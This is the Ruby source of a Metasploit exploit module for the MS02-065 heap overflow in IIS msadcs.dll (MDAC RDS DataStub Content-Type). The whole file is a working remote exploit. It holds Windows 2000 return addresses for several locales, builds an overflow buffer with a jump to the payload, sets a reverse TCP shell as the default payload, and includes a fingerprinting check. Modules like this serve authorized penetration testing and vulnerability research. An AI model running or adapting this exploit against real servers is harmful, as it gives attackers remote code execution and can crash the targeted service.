Path: blob/master/modules/exploits/windows/iis/ms02_065_msadc.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for the MDAC RDS DataStub 'Content-Type' heap overflow in the
# IIS msadcs.dll DataFactory service (MS02-065 / CVE-2002-1142, see
# 'References'). Affected versions per the description: MDAC 2.1 through 2.6;
# the MS02-065 bulletin listed below is the vendor advisory for the fix.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient

  # Registers module metadata (description, references, payload constraints,
  # per-locale targets, stability notes) and the single TARGETURI option
  # (alias PATH), which defaults to /msadc/msadcs.dll.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'MS02-065 Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow',
        'Description' => %q{
          This module can be used to execute arbitrary code on IIS servers
          that expose the /msadc/msadcs.dll Microsoft Data Access Components
          (MDAC) Remote Data Service (RDS) DataFactory service. The service is
          exploitable even when RDS is configured to deny remote connections
          (handsafe.reg). The service is vulnerable to a heap overflow where
          the RDS DataStub 'Content-Type' string is overly long. Microsoft Data
          Access Components (MDAC) 2.1 through 2.6 are known to be vulnerable.
        },
        'Author' => 'aushack',
        'Platform' => 'win',
        'Arch' => [ARCH_X86],
        'References' => [
          ['OSVDB', '14502'],
          ['BID', '6214'],
          ['CVE', '2002-1142'],
          ['MSB', 'MS02-065'],
          ['URL', 'http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0082.html']
        ],
        'Privileged' => false,
        'Payload' => {
          'Space' => 1024,
          # Bytes the encoder must avoid; the comment after the literal is the
          # same set written with readable escapes.
          'BadChars' => "\x00\x09\x0a\x0b\x0d\x20\x22\x27:?<>=$\\/;=+%#&", # "\u0000\t\n\v\r \"':?<>=$\\/;=+%#&"
          'StackAdjustment' => -3500
        },
        'DefaultOptions' => {
          'PAYLOAD' => 'windows/shell/reverse_tcp',
          'EXITFUNC' => 'seh' # stops IIS from crashing... hopefully
        },
        # Each target carries only a 'Ret' address, selected by Windows 2000
        # language/service-pack build.
        'Targets' => [
          # jmp eax ws2help.dll
          [ 'Windows 2000 Pro SP0-SP3 (English)', { 'Ret' => 0x75023783 } ],
          [ 'Windows 2000 Pro SP0 (Korean)', { 'Ret' => 0x74f93783 } ],
          [ 'Windows 2000 Pro SP0 (Dutch)', { 'Ret' => 0x74fd3783 } ],
          [ 'Windows 2000 Pro SP0 (Finnish)', { 'Ret' => 0x74ff3783 } ],
          [ 'Windows 2000 Pro SP0 (Turkish)', { 'Ret' => 0x74fc3783 } ],
          [ 'Windows 2000 Pro SP0-SP1 (Greek)', { 'Ret' => 0x74f73783 } ],
          [ 'Windows 2000 Pro SP1 (Arabic)', { 'Ret' => 0x74f93783 } ],
          [ 'Windows 2000 Pro SP1 (Czech)', { 'Ret' => 0x74fc3783 } ],
          [ 'Windows 2000 Pro SP2 (French)', { 'Ret' => 0x74fa3783 } ],
          [ 'Windows 2000 Pro SP2 (Portuguese)', { 'Ret' => 0x74fd3783 } ],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2002-11-02',
        # Operator-facing risk metadata: a failed attempt is declared able to
        # take the service down, and the request is declared to leave
        # indicators in logs.
        'Notes' => {
          'Reliability' => [REPEATABLE_SESSION],
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )

    register_options([
      OptString.new('TARGETURI', [ true, 'The path to msadcs.dll', '/msadc/msadcs.dll' ], aliases: [ 'PATH' ]),
    ])
  end

  # Fingerprints the service with a plain GET to TARGETURI and maps the reply
  # to a CheckCode: no response or HTTP 500 -> Unknown, 403 -> Safe,
  # 200 with 'Content-Type: application/x-varg' in the body -> Detected,
  # anything else -> Safe. This is a presence check only; it does not
  # establish whether the MS02-065 fix is installed.
  def check
    res = send_request_cgi('uri' => normalize_uri(target_uri.path))

    return CheckCode::Unknown('Connection failed') unless res
    return CheckCode::Unknown('HTTP server error') if res.code == 500
    # NOTE(review): a 403 is reported as Safe. That reflects this client's
    # access to the path, not necessarily that the DLL is absent or patched.
    return CheckCode::Safe('Access Forbidden') if res.code == 403

    if res.code == 200 && res.body.to_s.include?('Content-Type: application/x-varg')
      return CheckCode::Detected("#{target_uri.path} content type matches fingerprint application/x-varg")
    end

    CheckCode::Safe
  end

  # Builds the oversized Content-Type value the description refers to — a
  # 136-byte random alphanumeric buffer with a short jump patched in at
  # offset 24, followed by the selected target's 'Ret' and the encoded
  # payload — and POSTs it to AdvancedDataFactory.Query under TARGETURI.
  # The request path and body are what the IOC_IN_LOGS note refers to.
  def exploit
    sploit = rand_text_alphanumeric(136)
    sploit[24, 2] = Rex::Arch::X86.jmp_short(117)
    sploit << [target['Ret']].pack('V') # 'V' = 32-bit little-endian unsigned
    sploit << payload.encoded

    send_request_cgi({
      'uri' => normalize_uri(target_uri.path, '/AdvancedDataFactory.Query'),
      'method' => 'POST',
      'data' => "Content-Type: #{sploit}"
    })
  end
end